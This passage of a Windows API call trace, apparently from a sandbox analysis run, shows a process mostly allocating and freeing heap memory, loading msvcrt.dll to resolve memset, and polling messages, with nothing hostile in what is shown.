(HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0189.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.352] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.353] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0189.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1900 [0189.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1900, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0189.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.354] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0189.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.355] FreeLibrary (hLibModule=0x75c90000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.356] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.357] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0189.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0189.358] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0189.358] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0189.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0189.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0189.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0189.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0189.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0189.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.360] 